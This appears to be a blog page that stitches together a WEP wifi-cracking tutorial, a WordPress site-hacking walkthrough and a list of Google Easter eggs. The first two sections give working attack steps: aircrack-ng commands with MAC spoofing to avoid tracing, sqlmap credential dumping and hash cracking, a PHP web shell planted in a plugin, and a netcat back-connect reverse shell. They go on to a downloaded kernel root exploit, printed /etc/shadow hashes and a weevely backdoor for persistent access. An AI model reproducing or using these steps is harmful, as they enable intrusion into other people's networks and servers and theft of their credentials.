Learn how to Hack Wifi Password


This tutorial teaches you how to hack wifi passowrd in just 10 to 15 minutes. This tutorial explains How to Hack or Crack Wifi Password. This hack will work on hacking WEP encryption password.
So guys tighten your belts for new hack and lets start hack wifi.

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt). (FREE !!)
Download Backtrack Linux Live CD from here: http://http://www.backtrack-linux.org/downloads/

2. SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a “CONSOLE” . Now you should start your Wifi card. To do it so type

airmon-ng

You will see the name of your wireless card. (mine is named “ath0”) From here on out, replace “ath0” with the name of your card. Now type

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger –mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

airodump-ng ath0

Now you will see a list of wireless networks in the Console. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.
Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.

3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on…you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.

Once you’ve decided on a network, take note of its channel number and bssid. The bssid will look something like this —

00:23:69:bb:2d:of

The Channel number will be under a heading that says “CH”.

Now in the same CONSOLE window type:

airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0

The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don’t even put in an extension…just pick a random word that you will remember.

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won’t work. I usually name them as ben1, ben2 etc.

Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked “IV” with a number underneath it. This stands for “Initialization Vector” but in general terms all this means is “packets of info that contain characters of the password.” Once you gain a minimum of 5,000 of these IV’s, you can try to crack the password. I’ve cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.

4. Cracking the WEP password

Now leave this Console window up and running and open up a 2nd console window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to “Association Successful :-)”

If this happens, then good! You are almost there.

Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don’t worry about what these mean…just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds…sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Console window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final console window. This will be where we actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was “Ben”. Don’t put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV’s before it will crack. If this is the case, aircrack will test what you’ve got so far and then it will say something like “not enough IV’s. Retry at 10,000.”
DON’T DO ANYTHING! It will stay running…it is just letting you know that it is on pause until more IV’s are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say “not enough IV’s. Retry at 15,000.” and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn’t matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was “secret”, it would be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like “0FKW9427VF” then it would still display as:
0F:KW:94:27:VF

Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because…technically…this is just for you to test the security of your own network.

How to easy hack a wordpress site or blog

The answer to this question may be difficult to determine, simply because there are so many ways to hack a site. Our aim in this article to show you the techniques most used by hackers in targeting and hacking your site!
Let’s suppose that this is your site: hack-test.com
Let’s ping this site to get the server IP:
Now we have 173.236.138.113 – this is the server IP where our target site is hosted.
To find other sites hosted on the same server, we will use sameip.org:
Same IP
26 sites hosted on IP Address 173.236.138.113
ID
Domain
Site Link
1
hijackthisforum.com
2
sportforum.net
3
freeonlinesudoku.net
4
cosplayhell.com
5
videogamenews.org
6
gametour.com
7
qualitypetsitting.net
8
brendanichols.com
9
8ez.com
10
hack-test.com
11
kisax.com
12
paisans.com
13
mghz.com
14
debateful.com
15
jazzygoodtimes.com
16
fruny.com
17
vbum.com
18
wuckie.com
19
force5inc.com
20
virushero.com
21
twincitiesbusinesspeernetwork.com
22
jennieko.com
23
davereedy.com
24
joygarrido.com
25
prismapp.com
26
utiligolf.com
Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and put aside hacking the other sites on same server.
We’ll need more information about your site, such as:
  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)
Let’s start with finding your site’s DNS records. We will use the website “Who.is” to achieve this:

We have discovered that your site DNS records are:
HACK-TEST.COM DNS RECORDS
Record
Type
TTL
Priority
Content
hack-test.com
A
4 hours
173.236.138.113 ()
hack-test.com
SOA
4 hours
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com
NS
4 hours
ns1.dreamhost.com
hack-test.com
NS
4 hours
ns3.dreamhost.com
hack-test.com
NS
4 hours
ns2.dreamhost.com
www.hack-test.com
A
4 hours
173.236.138.113 ()
Let’s determine the web server type:
As you see, your site web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

Now it is time to find your Doman Registrar and your name, address, email and phone:
We have now got your registrar and other vital information about you. We can find the type of scripts on your site (the OS type, web server version) by using a cool tool in backtrack 5 R1 called Whatweb:
Now we found that your site is using a famous php script called WordPress, that your server os is Fedora Linux and that your web server version is (apache 2.2.15), let’s find open ports in your server.
To do this, we will use nmap:
1 – Find services that run on server
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
[email protected]:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – Find server OS
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
[email protected]:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Only port 80 is open and OS is Linux 2.6.22(Fedora Core 6)
Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities like
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.
We will use Nikto.pl to gather info, perhaps, some vulnerabilities:
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
[email protected]:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
– Nikto v2.1.4
—————————————————————————
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
—————————————————————————
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
—————————————————————————
+ 1 host(s) tested
We will also use W3AF. You can find this tool in backtrack 5 R1
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
  [email protected]:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af – Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
We will insert our site URL and choose full audit option:
After some time, the scan will finish and you will see
Your site is vulnerable to sql injection, xss and others!
Let’s investigate the sql injection vulnerability:
This is the vulnerable url and cat is the vulnerable parameter.
So, let’s exploit this vulnerability:
We will find that exploitating this vuln failed, so we will use sqlmap to the job and dump all database information that we need to hack this site J
Using sqlmap with –u url
After some seconds you will see
Type n and press enter to continue
As you see your site is vulnerable to error-based sql injection and your mysql database version is 5
Let’s find all databases in your site by adding “–dbs ”
Now we found 3 databases
We will dump wordpress database tables by adding “–D wordpress –tables ”
We will find all wordpress tables
We want to dump “wp_users” table, so we will find all users (admin?) information (user is and password hash) and try to crack hash and enter wordpress control panel ( wp-admin)
We will columns of “wp_users” table by adding “-T wp_users –columns ”
We will find 22 columns
We just need to dump to columns, so we will dump (user_login and user_pass ) columns by adding
-C user_login,user_pass –dump
We will find important information; we found now users and pass hashes
but we want to crack those hashes to clear text passwords. We will use the online site “http://www.onlinehashcrack.com/free-hash-reverse.php
And try to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054
And clear text password is q1w2e3
And user name is “GeorgeMiller”
We will login with these details in “wp-admin ”
And we are in!
Ok let’s try to upload php web shell to run some linux commands on your site server J
We will edit a plugin in wordpress called “Textile ” or any plugin you found in plugins page.
And choose to edit it
We will insert php web shell instead of real plugin. After we’ve done this, we will hit “update file” and browse to our new php shell
Woo, the php shell works. Now we can manipulate your site files, but we want only to get root on your server and hack all other sites too.
We will choose “back-connect “tab from php web shell and make back connection to our ip “192.168.1.6″ on port “5555″
But before we hit connect, we first make netcat listen on port “5555″ on our attacker machine
Now hit connect and you will see:
Let’s try some linux commands
?
01
02
03
04
05
06
07
08
09
10
11
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
Id command is used to show us what user id, group.
pwd command is used to show us our current path on server
uname –a command is used to show us some information about kernel version
Ok, now we knew that server kernel version is 2.6.31.5-127.fc12.1686
Let’s search in exploit-db.com for exploit to this version or newer version
We will type “kernel 2.6.31 ”
After I tried all of them on your server, none of them worked, but then I tried a new exploit
Date
D
A
V
Description
Plat.
Author
2010-10-19
9977
I opened this url and copied this link
http://www.exploit-db.com/download/15285
And made this command on my netcat shell
?
01
02
03
04
05
06
07
08
09
10
11
12
13
wget http://www.exploit-db.com/download/15285 -O roro.c
–2011-12-28 00:48:01– http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com… 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
–2011-12-28 00:48:02– http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c’
0K …… 100% 29.7K=0.2s
We used wget command to fetch exploit from exploit-db.com and used –O to rename it to roro.c
Note: linux kernel exploits mostly is being delopped in c language so we saved it in .c extension, just view exploit source and you will find
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0) {
printf(“[*] Could not open socket.n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
All the above lines indicate that this is exploit is written in C language
After we saved our exploit on server, we will compile it to elf format by typing
gcc roro.c –o roro
And run our exploit by typing
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
./roro
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
And after that we type
Id
We will find that we are root J
uid=0(root) gid=0(root)
We can now view /etc/shadow file
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
And view /etc/passwd file
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:”Saslauthd user”:/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
We can crack all users passwords with the “john the ripper” tool.
But we will not do this; we want to maintain access on this server so we can come to visit/hack it any time J
We will use weevely to a small and encoded php backdoor with the password protected and upload this php backdoor to our server.
Let’s do it
1 – weevely usage options :
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
[email protected]:/pentest/backdoors/web/weevely# ./main.py –
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Usage: main.py [options]
Options:
-h, –help show this help message and exit
-g, –generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, –output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, –command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, –terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, –cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form ‘label,url,password’ where label is
optional.
-p PASSWORD, –password=PASSWORD
Password of the encrypted backdoor .
-u URL, –url=URL Remote backdoor URL .
2 – Creating a php backdoor with password koko by using weevely:
?
1
2
3
4
5
6
7
8
[email protected]:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file ‘hax.php’ created with password ‘koko’.
3 – Upload our php backdoor to server using php web shell
And after we upload it we will connect to it using
?
01
02
03
04
05
06
07
08
09
10
11
12
[email protected]:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[[email protected] /var/www/html/Hackademic_RTB1/wp-content/plugins]
Testing our hax.php backdoor

Conclusion:

In this article we learned some techniques that are being used by hackers to target and hack your site and your server. I hope you liked this article and enjoyed it.
In next article we will learn how we can secure your site from these attacks and more, so your website will be very secured against many hacker attacks, even advanced ones!

Make google do amazing things

Google Barrel! Just go to Google.com and type “Do a barrel roll”, see what happens.

Its pretty amazing thing google did, wonder why they even did this. And it makes me wonder more what else google can do and is hidden from all us.

Other amazing things google does-

  • tilt 
  • askew 
  • ascii art ( the logo changes) 

Search for –  ” answer to life, the universe, and everything ” , you will get an amazing answer.

Search for “recursion” and you get->
“did you mean “recursion””… and click on the new link . I think you get it now.

Seach for “Where is Chuck Norris” and click on the first result. Its hillarious. And for who actually don’t know Chuck Norris is Rajnikant of hollywood.

Also try these and hit the first result or “I am feeling lucky” button on search

  • “Google Goth”
  • “Google Gravity”
  • “Google Klingon”
  • “Google Pirate”
  • “Who’s the Cutest?”
  • “Ewmew fudd”
  • “Google Piglatin”